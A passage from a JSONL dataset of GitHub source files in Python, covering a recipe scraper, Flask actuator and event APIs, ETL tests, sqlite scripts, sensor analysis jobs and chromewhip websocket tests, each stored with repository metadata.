frameData.getTYList(), \"gx\",label='Trace Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getCXList(), frameData.getCYList(), \"y+\")\n\t\t\t\t\t\t\tplt.xlim(frameData.getVP().getX() - xarea, frameData.getVP().getX() + xarea)\n\t\t\t\t\t\t\tplt.ylim(frameData.getVP().getY() - yarea, frameData.getVP().getY() + yarea)\n\t\t\t\t\t\t\tplt.gca().set_aspect('equal', adjustable='box')\n\t\t\t\t\t\t\tplt.legend()\n\t\t\t\t\t\t\tplt.grid(True)\n\t\t\t\t\t\t\tif getPress():\n\t\t\t\t\t\t\t\tsetPressFalse()\n\t\t\t\t\t\t\t\t#print(\"###########Change Next Set###########\")\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tplt.pause(0.0001)\t\n\t\t\t\t\t\t\t\tplt.cla()\t\t\n\t\t\t\t\tprint(\"###########Change Next Set###########\")\n\t\t\t\t\tgroupIdx = groupIdx + 1\t\t\n\t\t\t\t\tplt.show()\n\n\t\tprint(\"###########finsh###########\")\n\n\n","repo_name":"yangtzey/LogReplay","sub_path":"PlanReplay.py","file_name":"PlanReplay.py","file_ext":"py","file_size_in_byte":12441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37653139810","text":"#!/usr/bin/env python\nimport lsst.eotest.sensor as sensorTest\nimport siteUtils\nimport eotestUtils\n\nsensor_id = siteUtils.getUnitId()\n\ngains = eotestUtils.getSensorGains(jobname='fe55_offline')\nsflat_high_files = siteUtils.datacatalog_glob('*_sflat_500_flat_H*.fits',\n testtype='SFLAT_500',\n imgtype='FLAT',\n description='Superflat high files:')\ntask = sensorTest.CteTask()\ntask.run(sensor_id, sflat_high_files, flux_level='high', gains=gains)\n\nsflat_low_files = siteUtils.datacatalog_glob('*_sflat_500_flat_L*.fits',\n testtype='SFLAT_500',\n imgtype='FLAT',\n description='Superflat low files:')\ntask = sensorTest.CteTask()\ntask.run(sensor_id, sflat_low_files, flux_level='low', gains=gains)\n","repo_name":"lsst-camera-dh/harnessed-jobs","sub_path":"SLAC/cte_offline/v0/producer_cte_offline.py","file_name":"producer_cte_offline.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27562675243","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom django.conf import settings\nimport re\nimport os\n\nfrom bs4 import BeautifulSoup\nimport urllib3\nimport chefkoch2book.picture_grid\nfrom PIL import Image\nfrom chefkoch2book import picture_grid\nfrom symbol import except_clause\nimport json\n#from chefkoch2book import collage_maker\n\n\ndef makelist(table):\n result = []\n allrows = table.findAll('tr')\n for row in allrows:\n result.append([])\n allcols = row.findAll('td')\n for col in allcols:\n thestrings=[]\n thestring =\"\"\n for thestring in col.stripped_strings:\n thestring = re.sub(r'\\s+',' ',thestring)\n #thestring = thestring.replace('\\n', '')\n thestrings.append(thestring)\n thetext = ''.join(thestrings)\n result[-1].append(thetext)\n return result\n\n@ensure_csrf_cookie\ndef index(request):\n bg_images_list = os.listdir(os.path.join(settings.BASE_DIR, \"chefkoch2book/static/chefkoch2book/backgrounds/chapters\"))\n #backgoundimages =\n \n return render(request, 'chefkoch2book/index.html', {'backgroundimages' : json.dumps(bg_images_list)})\n\n\ndef get_recipe_data(url):\n \n recipe = {\"url\": url}\n \n soup = soupify(url)\n content = soup.find(\"div\", {\"class\": \"content-left\"})\n \n recipe['title'] = soup.find(\"div\", {\"id\": \"content\"}).find(\"h1\").getText()\n try:\n recipe['subtitle'] = soup.find(\"div\", {\"id\": \"content\"}).find(\"strong\").getText()\n except Exception:\n pass\n \n recipe['ingredients'] = makelist(soup.find(\"table\", {\"class\": \"incredients\"}))\n imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n recipe['recipe_info'] = makelist(content.find(\"table\", {'id':'recipe-info'}).extract())\n recipe['content'] = re.sub(r'\\s+',' ',content.get_text('
', strip=True)).replace('\\n', '')\n \n images = []\n for imagediv in imagesdivs:\n images.append(imagediv.find('img').get('data-bigimage'))\n recipe['images'] = images\n \n return recipe\n \n #ingredientsString = \"\"\n #for item in ingredients:\n # ingredientsString += str(item)\n\n\ndef get_recipe_data_json(request):\n url = request.POST['url'];\n recipe_data = get_recipe_data(url)\n return JsonResponse(recipe_data)\n\n# Create your views here.\ndef get_recipe(request):\n \n #url = request.POST['url']\n \n output = get_recipe_data('https://www.chefkoch.de/rezepte/drucken/1108101216891426/2309481a/1/Apfelkuchen-mit-Streuseln-vom-Blech.html')\n \n #output = \"
\"+ingredientsString+\"
\" + \"
\"+content_pretty+\"

INFO

\" + recipe_info.prettify() + \"
\" + '' #+ \"
\"+ingredients+\"
\"\n \n return render(request, 'chefkoch2book/recipes/normal-preview.html', output)\n\ndef soupify(url):\n \n if \"/drucken/\" not in url:\n url = url.replace(\"/rezepte/\", \"/rezepte/drucken/\")\n http = urllib3.PoolManager()\n response = http.request('GET', url)\n\n return BeautifulSoup(response.data, 'html.parser')\n\n\n\ndef get_image_grid(request):\n \n images = request.GET['urls'];\n \n collage_image = picture_grid.create_grid(images, 4, 4, 2100, 2970, 10, 0)\n response = HttpResponse(content_type=\"image/png\")\n collage_image.save(response, \"png\", dpi=(72,72))\n return response\n \n \n #soup = soupify('https://www.chefkoch.de/rezepte/drucken/1108101216891426/2309481a/1/Apfelkuchen-mit-Streuseln-vom-Blech.html')\n #imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n #images = []\n #for imagediv in imagesdivs:\n # images.append(imagediv.find('img').get('data-bigimage'))\n \n\n\ndef get_collage(request, url):\n soup = soupify(url)\n imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n images = []\n for imagediv in imagesdivs:\n images.append(imagediv.find('img').get('data-bigimage'))\n \n collage_image = picture_grid.create_grid(images, 5, 10, int(2100/2), int(2970/2), 10, 0)\n \n response = HttpResponse(content_type=\"image/png\")\n collage_image.save(response, \"png\", dpi=(72,72))\n return response\n\ndef get_normal_template(request):\n if request.POST['template'] is not None:\n template = request.POST['template']\n \n return render(request, 'chefkoch2book/recipes/normal.html')\n\ndef render_recipe(request, template):\n\n data = json.loads(request.POST['jsonData'])\n\n \n return render(request, 'chefkoch2book/recipes/'+ template + '/' + template +'.html', data)\n\n\n\ndef render_book(request):\n bg_images_list = os.listdir(os.path.join(settings.BASE_DIR, \"chefkoch2book/static/chefkoch2book/backgrounds/chapters\"))\n recipes = request.POST['jsonData']\n data = {\"recipes\": recipes}\n \n\n return render(request, 'chefkoch2book/recipes/twoColumns/twoColumns.html', data)\n\n","repo_name":"marplaa/chefkoch2cookbook","sub_path":"chefkoch2book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74292410794","text":"\"\"\"\ncomposition\n\"\"\"\nfrom book import Book\n\n\nclass Author:\n \"\"\"Author class\"\"\"\n def __init__(self, name, books, title, author, pub_year):\n self.title = title\n self.author = author\n self.pub_year = pub_year\n self.my_author = Book(name, books)\n","repo_name":"jeethsoni/OOP-oops","sub_path":"modules/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43049196237","text":"__author__ = 'Samuele'\n\nfrom flask import Flask, jsonify\nimport serial\n\napp = Flask(__name__)\n\nser = serial.Serial('/dev/ttymxc3', 115200, timeout=1)\nser.flushOutput()\n\ncurrent_fan_status = 0\ncurrent_irrigation_status = 0\ncurrent_light_value = 0\n\n@app.route(\"/fan\", methods=['GET'])\ndef get_fan_status():\n return jsonify({'status': current_fan_status})\n\n\n@app.route(\"/fan/\", methods=['GET'])\ndef set_fan_status(new_fan_status):\n global current_fan_status\n if new_fan_status > 0:\n current_fan_status = 1\n ser.write(\"F1\")\n else:\n current_fan_status = 0\n ser.write(\"F0\")\n\n return jsonify({'status': current_fan_status}), 201\n\n\n@app.route(\"/irrigation\", methods=['GET'])\ndef get_irrigation_status():\n return jsonify({'status': current_irrigation_status})\n\n\n@app.route(\"/irrigation/\", methods=['GET'])\ndef set_irrigation_status(new_irrigation_status):\n if new_irrigation_status > 0:\n global current_irrigation_status\n current_irrigation_status = 1\n ser.write(\"I1\")\n else:\n current_irrigation_status = 0\n ser.write(\"I0\")\n\n return jsonify({'status': current_irrigation_status}), 201\n\n\n@app.route(\"/light\", methods=['GET'])\ndef get_light_status():\n return jsonify({'status': current_light_value})\n\n\n@app.route(\"/light/\", methods=['GET'])\ndef set_light_value(new_light_value):\n global current_light_value\n current_light_value = new_light_value\n\n ser.write(\"L\" + 'current_light_value')\n\n return jsonify({'status': current_light_value}), 201\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')","repo_name":"AppsThor/CooltivateActuator","sub_path":"serverUdoo.py","file_name":"serverUdoo.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20655530144","text":"import os\nfrom pathlib import Path\n\nimport pandas as pd\nimport pytest\n\nfrom src.aquisicao.inep.gestor import GestorETL\n\n\n@pytest.fixture(scope=\"module\")\ndef gestor_etl(dados_path: Path, test_path: Path, ano: int) -> GestorETL:\n etl = GestorETL(\n entrada=dados_path / \"externo\",\n saida=test_path,\n ano=ano,\n criar_caminho=False,\n reprocessar=False,\n )\n etl._inep = {k: \"\" for k in os.listdir(dados_path / f\"externo/censo_escolar\")}\n return etl\n\n\n@pytest.mark.run(order=1)\ndef test_extract(gestor_etl: GestorETL, ano: int) -> None:\n gestor_etl.extract()\n\n assert gestor_etl.dados_entrada is not None\n assert len(gestor_etl.dados_entrada) == 1\n assert gestor_etl.ano == ano\n assert {f\"{ano}\"} == set(gestor_etl.dados_entrada)\n assert isinstance(gestor_etl.dados_entrada[f\"{ano}\"], pd.DataFrame)\n\n\n@pytest.mark.run(order=2)\ndef test_gera_dt_nascimento(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n gestor_etl.gera_dt_nascimento(base)\n assert \"DT_NASCIMENTO\" in base\n assert base[\"DT_NASCIMENTO\"].dtype == \"datetime64[ns]\"\n\n\n@pytest.mark.run(order=3)\ndef test_processa_tp(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n gestor_etl.processa_tp(base)\n\n for c in gestor_etl._configs[\"DEPARA_TP\"]:\n if c in base:\n assert \"category\" == base[c].dtype\n\n\n@pytest.mark.run(order=4)\ndef test_remove_duplicatas(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n cols = set(base)\n\n base_id = gestor_etl.remove_duplicatas(base)\n\n assert base_id is not None\n depara_cols = set([\"ID_GESTOR\", \"ANO\"] + gestor_etl._configs[\"COLS_DEPARA\"])\n assert depara_cols == set(base_id)\n assert cols - set(gestor_etl._configs[\"COLS_DEPARA\"]) == set(base)\n\n gestor_etl.base_id = base_id # type: ignore\n\n\n@pytest.mark.run(order=5)\ndef test_ajusta_schema(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n base = gestor_etl.ajusta_schema(\n base=base,\n fill=gestor_etl._configs[\"PREENCHER_NULOS\"],\n schema=gestor_etl._configs[\"DADOS_SCHEMA\"],\n )\n for c in gestor_etl._configs[\"PREENCHER_NULOS\"]:\n if c in gestor_etl._configs[\"DADOS_SCHEMA\"]:\n assert base.shape[0] == base[c].count(), f\"{c}\"\n assert set(base) == set(gestor_etl._configs[\"DADOS_SCHEMA\"])\n for col, dtype in gestor_etl._configs[\"DADOS_SCHEMA\"].items():\n if not dtype.startswith(\"pd.\"):\n assert base[col].dtype == dtype\n\n base_id = gestor_etl.base_id # type: ignore\n base_id = gestor_etl.ajusta_schema(\n base=base_id,\n fill=gestor_etl._configs[\"PREENCHER_NULOS\"],\n schema=gestor_etl._configs[\"DEPARA_SCHEMA\"],\n )\n for c in gestor_etl._configs[\"PREENCHER_NULOS\"]:\n if c in gestor_etl._configs[\"DEPARA_SCHEMA\"]:\n assert base_id.shape[0] == base_id[c].count()\n assert set(base_id) == set(gestor_etl._configs[\"DEPARA_SCHEMA\"])\n for col, dtype in gestor_etl._configs[\"DEPARA_SCHEMA\"].items():\n if not dtype.startswith(\"pd.\"):\n assert base_id[col].dtype == dtype\n","repo_name":"Ignorancia-Zero/curso-ciencia-dados-treino","sub_path":"src/tests/aquisicao/test_gestor.py","file_name":"test_gestor.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"16622292011","text":"# -*- coding: utf8 -*-\r\nimport sqlite3\r\n\r\ndef Inserir_Dados_Arquivo(cpf, nome):\r\n conn = sqlite3.connect('arquivo_cdra')\r\n curs = conn.cursor()\r\n curs.execute('insert into alunos values (null, ?, ?, null, null)', (cpf,nome))\r\n print('CPF: ',cpf,' ', 'Nome: ', nome,'- Inserido com Sucesso!!!')\r\n conn.commit()\r\n conn.close()\r\n\t\r\n\t\r\n\t\r\n#Inserir_Dados_Arquivo('cpf','nome')\r\n\r\n\r\n\r\ndef Verificar_Inserir_Dados_Arquivo(cpf, nome):\r\n conn = sqlite3.connect('arquivo_cdra')\r\n curs = conn.cursor()\r\n sql = \"select cpf from alunos where cpf = '%s'\" % cpf\r\n curs.execute(sql)\r\n if len(curs.fetchall()) >=1 and len(cpf)==14:\r\n print('Dados já constantes no banco de dados....')\r\n else:\r\n curs.execute('insert into alunos values (null,?,?,null,null)', (cpf, nome))\r\n print('CPF: %s - Nome: %s - Inserido com Sucesso!' % (cpf, nome))\r\n curs.execute('select cpf from alunos')\r\n print('Total de dados inseridos no banco de dados: ', len(curs.fetchall()))\r\n conn.commit()\r\n conn.close()\r\n\r\nVerificar_Inserir_Dados_Arquivo('000.111.222-33','Fulano de Tal')\r\n","repo_name":"Richardson7ago/gerenciamento-de-arquivo","sub_path":"DBscript002_Inserção_Manual.py","file_name":"DBscript002_Inserção_Manual.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31912227703","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 3 00:12:20 2019\r\n\r\n@author: cyshi\r\n\"\"\"\r\nfrom biosteam.units import * \r\n\r\nfrom biosteam_lca.units.energy_inventory import demand_per_hr, unit_lci, unit_lca\r\n\r\ndef energy_inputs(self):\r\n \"\"\" summary of all power utilities and heat utilities for the unit process.\"\"\"\r\n return ('Energy inputs per hour:{}'.format(demand_per_hr(self.heat_utilities, self.power_utility)))\r\n\r\ndef energy_inventory(self):\r\n \"\"\" returns a dict of inventory flows and amounts\"\"\"\r\n return unit_lci(self.heat_utilities, self.power_utility)\r\n\r\ndef multiLCA(self):\r\n return unit_lca(self.heat_utilities, self.power_utility)\r\n\r\nclasses = [\r\n LLECentrifuge, \r\n Flash, \r\n ConveyingBelt, \r\n CrushingMill, \r\n Shredder, \r\n Clarifier, \r\n RotaryVacuumFilter, \r\n LiquidsSplitCentrifuge, \r\n SolidsCentrifuge, \r\n VentScrubber, \r\n BinaryDistillation, \r\n SplitFlash, \r\n MultiEffectEvaporator,\r\n HXutility,\r\n Pump, \r\n Transesterification, \r\n VibratingScreen, \r\n EnzymeTreatment, \r\n StorageTank, \r\n MixTank, \r\n MagneticSeparator, \r\n MolecularSieve \r\n ]\r\n\r\n\r\n\r\n\r\nfor i in classes:\r\n setattr(i, 'energy_inventory', energy_inventory)\r\n setattr(i, 'multiLCA', multiLCA)\r\n#setattr(LLECentrifuge, 'multiLCA', energy_inventory)\r\n\r\n\r\n","repo_name":"scyjth/biosteam_lca","sub_path":"biosteam_lca/units/units_e.py","file_name":"units_e.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"3264994877","text":"# Estrutura de Dados\n# Aula 02: Recursividade \n# Professor: Rodolfo Carneiro Cavalcante\n# Aluno: Jônatas Duarte Vital Leite\n# Exercício 01: Implemente uma função recursiva que, dados dois números inteiros x e n, calcule o valor de x.n\nimport random\n\ndef multiplicacao(x, n):\n if(n == 0 or x == 0):\n return 0\n elif (n != 0):\n if(n < 0):\n x = -x\n n = -n\n return x + multiplicacao(x, n-1)\n return x\n\n# x = int(input(\"x: \"))\n# n = int(input(\"n: \"))\n\nx = random.randint(-10, 10)\nn = random.randint(-10, 10)\n\nprint(x,\"x\",n,\"=\",multiplicacao(x, n))\n\n","repo_name":"JonatasDVL/ufal","sub_path":"estrutura-de-dados/aula02/exercicios/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33177983084","text":"from basic_calculator import calculate\n\nwith open('C:\\\\Development\\\\BCS-DevOps\\\\modules\\\\module01-general_purpose_coding\\\\labs\\\\python_calculator\\\\step_3.txt', mode='r') as f:\n text_string_list = f.read().splitlines()\n #print(len(text_string_list))\n\n\nstatement = text_string_list[1]\nexec_statements = [statement]\n\n\nstatement_visited = False\n\nwhile not statement_visited:\n\n calc_list = statement.split()\n\n if len(calc_list) > 2:\n calc_result = calculate(calc_list[2], int(calc_list[3]), int(calc_list[4]))\n else:\n calc_result = calc_list[1]\n\n statement = text_string_list[int(calc_result)]\n\n if not statement in exec_statements:\n exec_statements.append(statement)\n print(statement)\n else:\n print('Code stopping at line: ' + str(calc_result))\n statement_visited = True\n\n #print(calc_result)\n\n","repo_name":"ahfontalba/basic-python-calculator","sub_path":"step3_goto.py","file_name":"step3_goto.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13462174161","text":"from flask import Flask, request, jsonify, Blueprint\nfrom flask_sqlalchemy import SQLAlchemy\nfrom __init__ import db\nfrom models import EventoTable, ListaConvidadosTable, PessoaTable, MoradorTable\nfrom serializer import EventoSchema, ListaConvidadosSchema\nimport datetime\n\n\nbp_evento = Blueprint('evento', __name__)\n\n@bp_evento.route('/evento/criar', methods=['POST'])\ndef create():\n\n cpf = request.json['cpf']\n data = request.json['data']\n hinicio = request.json['inicio']\n hfinal = request.json['final']\n predio = request.json['predio']\n\n inicio = data+' '+hinicio\n final = data+' '+hfinal\n\n #try:\n\n mrd = PessoaTable.query.filter_by(cpf=cpf).first()\n mrd = MoradorTable.query.filter_by(morador_idpes=mrd.id).first()\n mrd = mrd.id\n\n new_evento = EventoTable(inicio, final, mrd, predio)\n\n db.session.add(new_evento)\n db.session.commit() \n \n return jsonify({\"message\":'Evento criado com sucesso!'})\n \n #except:\n #return jsonify({\"message\":'Erro ao criar evento. Verifique as informações inseridas e se a data e horário estão disponíveis.'})\n\n@bp_evento.route('/evento/mostrar', methods=['GET'])\ndef show_all():\n\n eventos = EventoTable.query.all()\n output = []\n cont = 0\n\n try:\n for e in eventos:\n pes = MoradorTable.query.get(eventos[cont].evento_idmrd)\n pes = PessoaTable.query.get(pes.morador_idpes)\n pes = pes.nome\n\n\n output.append({\"id\":eventos[cont].id, \"organizador\": pes, \"data\": eventos[cont].inicio.strftime('%d/%m/%Y'), \"inicio\": eventos[cont].inicio.strftime('%H:%M'), \"final\": eventos[cont].final.strftime('%H:%M'), \"predio\": eventos[cont].evento_idprd })\n cont = cont+1\n\n return jsonify(output)\n\n except:\n return jsonify({\"message\":'Sem registros.'})\n\n@bp_evento.route('/evento/mostrar/', methods=['GET'])\ndef show_by_id(id):\n evento = EventoTable.query.get(id)\n\n try:\n pes = MoradorTable.query.get(evento.evento_idmrd)\n pes = PessoaTable.query.get(pes.morador_idpes)\n\n\n\n output = {\"id\":evento.id, \"organizador\": pes.nome, \"data\": evento.inicio.strftime('%d/%m/%Y'), \"inicio\": evento.inicio.strftime('%H:%M'), \"final\": evento.final.strftime('%H:%M'), \"predio\": evento.evento_idprd }\n\n return jsonify(output)\n \n except:\n return jsonify({\"message\":'Sem registros.'})\n\n@bp_evento.route('/evento/alterar/', methods=['PUT'])\ndef modify(id):\n evento = EventoTable.query.get(id)\n\n cpf = request.json['cpf']\n data = request.json['data']\n hinicio = request.json['inicio']\n hfinal = request.json['final']\n predio = request.json['predio']\n\n try:\n if cpf != '':\n mrd = PessoaTable.query.filter_by(cpf=cpf).first()\n mrd = MoradorTable.query.filter_by(morador_idpes=mrd.id).first()\n evento.evento_idmrd = mrd.id\n\n if hinicio != '':\n evento.inicio = datetime.datetime.strptime(evento.inicio.strftime('%d/%m/%Y')+' '+hinicio, '%d/%m/%Y %H:%M')\n\n if hfinal != '':\n evento.final = datetime.datetime.strptime(evento.final.strftime('%d/%m/%Y')+' '+hfinal, '%d/%m/%Y %H:%M')\n\n if data != '':\n dinicio = data+' '+evento.inicio.strftime('%H:%M')\n dfinal = data+' '+evento.final.strftime('%H:%M')\n \n evento.inicio = datetime.datetime.strptime(dinicio, '%d/%m/%Y %H:%M')\n evento.final = datetime.datetime.strptime(dfinal, '%d/%m/%Y %H:%M')\n\n if predio != '':\n evento.evento_idprd = predio\n\n db.session.commit()\n \n return jsonify({\"message\":'Informações do evento alteradas com sucesso!', \"status\":200})\n \n except:\n return jsonify({\"message\":'Não foi possível alterar as informações do evento. Verifique as informações inseridas.', \"status\":200})\n\n@bp_evento.route('/evento/deletar/', methods=['DELETE'])\ndef delete(id):\n\n try:\n evento = EventoTable.query.get(id)\n \n db.session.delete(evento)\n db.session.commit()\n\n return jsonify({\"message\":'Evento deletado com sucesso!',\"status\":200})\n \n except:\n return jsonify({\"message\":'Erro ao deletar evento.', \"status\":400})","repo_name":"PedroLS2603/back-end-api-tcc","sub_path":"app/api/event/event_routes.py","file_name":"event_routes.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27286302134","text":"import asyncio\nimport copy\nimport json\nimport logging\nimport queue\n\nimport pytest\nimport websockets\nfrom websockets.exceptions import ConnectionClosed\n\n\nfrom chromewhip import chrome, helpers\nfrom chromewhip.protocol import page, network\n\nTEST_HOST = 'localhost'\nTEST_PORT = 32322\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n\nclass ChromeMock:\n\n def __init__(self, host, port):\n self._tabs = []\n\n async def connect(self):\n tab = chrome.ChromeTab('test', 'about:blank', f'ws://{TEST_HOST}:{TEST_PORT}', '123')\n self._tabs = [tab]\n\n @property\n def tabs(self):\n return self._tabs\n\n\n@pytest.fixture\nasync def chrome_tab():\n \"\"\"Ensure Chrome is running\n \"\"\"\n browser = ChromeMock(host=TEST_HOST, port=TEST_PORT)\n await browser.connect()\n chrome_tab = browser.tabs[0]\n yield chrome_tab\n print(\"gracefully disconnecting chrome tab...\")\n try:\n await chrome_tab.disconnect()\n except ConnectionClosed:\n pass\n\ndelay_s = float\n\n\ndef init_test_server(triggers: dict, initial_msgs: [dict] = None, expected: queue.Queue = None):\n \"\"\"\n :param initial_msgs:\n :param triggers:\n :param expected: ordered sequence of messages expected to be sent by chromewhip\n :return:\n \"\"\"\n async def test_server(websocket, path):\n \"\"\"\n :param websocket:\n :param path:\n :return:\n \"\"\"\n log.info('Client connected! Starting handler!')\n if initial_msgs:\n for m in initial_msgs:\n await websocket.send(json.dumps(m, cls=helpers.ChromewhipJSONEncoder))\n\n c = 0\n\n try:\n while True:\n msg = await websocket.recv()\n log.info('Test server received message!')\n c += 1\n obj = json.loads(msg)\n\n if expected:\n try:\n exp = expected.get(block=False)\n except queue.Empty:\n pytest.fail('more messages received that expected')\n\n assert exp == obj, 'message number %s does not match, exp %s != recv %s' % (c, exp, obj)\n\n # either id or method\n is_method = False\n id_ = obj.get('id')\n\n if not id_:\n id_ = obj.get('method')\n if not id_:\n pytest.fail('received invalid message, no id or method - %s ' % msg)\n is_method = True\n\n response_stream = triggers.get(id_)\n\n if not response_stream:\n pytest.fail('received unexpected message of %s = \"%s\"'\n % ('method' if is_method else 'id', id_))\n\n if not len(response_stream):\n log.debug('expected message but no expected response, continue')\n\n log.debug('replying with payload \"%s\"' % response_stream)\n for r in response_stream:\n if isinstance(r, int):\n await asyncio.sleep(r)\n else:\n await websocket.send(json.dumps(r, cls=helpers.ChromewhipJSONEncoder))\n except asyncio.CancelledError as e:\n # TODO: look at failure logic here, why cancelled error? why empty? empty could mean it is working properly\n # if expected.empty():\n # pytest.fail('less messages received that expected')\n raise e\n return test_server\n\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_prior_to_commmand_containing_event_id(event_loop, chrome_tab):\n\n msg_id = 4\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n\n ack = {'id': msg_id, 'result': {'frameId': frame_id}}\n triggers = {\n msg_id: [ack]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n\n initial_msgs = [fe]\n\n test_server = init_test_server(triggers, initial_msgs=initial_msgs, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p, await_on_event_type=page.FrameNavigatedEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameNavigatedEvent)\n assert event.frame.id == f.id\n assert event.frame.url == f.url\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_after_commmand_containing_event_id(event_loop, chrome_tab):\n msg_id = 4\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n\n ack = {'id': msg_id, 'result': {'frameId': frame_id}}\n triggers = {\n msg_id: [ack, delay_s(1), fe]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n q.put(copy.copy(end_msg))\n\n test_server = init_test_server(triggers, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p, await_on_event_type=page.FrameNavigatedEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameNavigatedEvent)\n assert event.frame.id == f.id\n assert event.frame.url == f.url\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def test_send_command_can_trigger_on_event_with_input_event(event_loop, chrome_tab):\n \"\"\"test_send_command_can_trigger_on_event_with_input_event\n Below is test case that will workaround this issue\n https://github.com/chuckus/chromewhip/issues/2\n \"\"\"\n msg_id = 4\n old_frame_id = '2000.1'\n frame_id = '3228.1'\n url = 'http://example.com'\n\n chrome_tab._message_id = msg_id - 1\n f = page.Frame(frame_id, 'test', url, 'test', 'text/html')\n p = page.Page.navigate(url)\n fe = page.FrameNavigatedEvent(f)\n fsle = page.FrameStoppedLoadingEvent(frame_id)\n\n # command ack is not related to proceeding events\n ack = {'id': msg_id, 'result': {'frameId': old_frame_id}}\n triggers = {\n msg_id: [ack, delay_s(1), fe, fsle]\n }\n\n end_msg = copy.copy(p[0])\n end_msg['id'] = msg_id\n q = queue.Queue()\n q.put(end_msg)\n\n test_server = init_test_server(triggers, expected=q)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n result = await chrome_tab.send_command(p,\n input_event_type=page.FrameNavigatedEvent,\n await_on_event_type=page.FrameStoppedLoadingEvent)\n assert result.get('ack') is not None\n assert result.get('event') is not None\n event = result.get('event')\n assert isinstance(event, page.FrameStoppedLoadingEvent)\n assert event.frameId == f.id\n\n server.close()\n await server.wait_closed()\n\n@pytest.mark.asyncio\nasync def xtest_can_register_callback_on_devtools_event(event_loop, chrome_tab):\n # TODO: double check this part of the api is implemented\n interception_id = '3424.1'\n msg_id = 7\n chrome_tab._message_id = msg_id - 1\n fake_request = network.Request(url='http://httplib.org',\n method='POST',\n headers={},\n initialPriority='superlow',\n referrerPolicy='origin')\n msgs = [\n network.RequestInterceptedEvent(interceptionId=interception_id,\n request=fake_request,\n resourceType=\"Document\",\n isNavigationRequest=False)\n\n ]\n\n enable = network.Network.setRequestInterceptionEnabled(enabled=True)\n\n # once emable command comes, send flurry in intercept events\n triggers = {\n msg_id: msgs\n }\n\n expected = queue.Queue()\n e0 = copy.copy(enable[0])\n e0['id'] = msg_id\n expected.put(e0)\n e1 = network.Network.continueInterceptedRequest(interceptionId=interception_id)\n expected.put(e1)\n\n test_server = init_test_server(triggers, expected=expected)\n start_server = websockets.serve(test_server, TEST_HOST, TEST_PORT)\n server = await start_server\n await chrome_tab.connect()\n\n log.info('Sending command and awaiting...')\n # TODO: registration api\n\n # no point returning data as nothing to do with it.\n # but how would i go about storing 